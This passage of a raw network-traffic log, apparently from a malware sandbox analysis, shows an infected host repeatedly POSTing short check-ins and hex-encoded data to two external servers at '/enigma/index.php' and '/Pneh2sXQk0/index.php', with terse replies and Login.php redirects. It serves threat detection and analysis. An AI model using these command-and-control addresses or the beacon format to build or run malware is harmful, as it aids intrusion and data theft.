                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.939481974 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1546192.168.2.551402193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:03.785914898 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.029108047 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1547192.168.2.551403193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.252887011 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.493298054 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1548192.168.2.551404193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.279618025 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.528647900 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1549192.168.2.551405193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.742151976 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.989938021 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1550192.168.2.551406193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:04.863385916 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:05.106466055 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1551192.168.2.551407193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:05.322247982 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:05.569333076 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1552192.168.2.551408193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:05.357223034 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:05.608403921 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1553192.168.2.551409193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:05.819531918 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:06.067626953 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1554192.168.2.551410193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:05.947423935 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:06.194155931 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1555192.168.2.551411193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:06.399560928 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:06.647248030 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1556192.168.2.551412193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:06.451627016 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:06.706655979 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1557192.168.2.551414193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:06.993541956 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:07.241133928 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1558192.168.2.551415193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:07.042510986 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:07.291069984 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1559192.168.2.551416193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:07.499102116 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:07.752321959 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1560192.168.2.551417193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:07.551675081 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:07.808195114 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1561192.168.2.551418193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:08.070677996 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:08.314866066 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1562192.168.2.551419193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:08.141558886 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:08.387972116 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:37:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1563192.168.2.551420193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:37:08.567603111 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
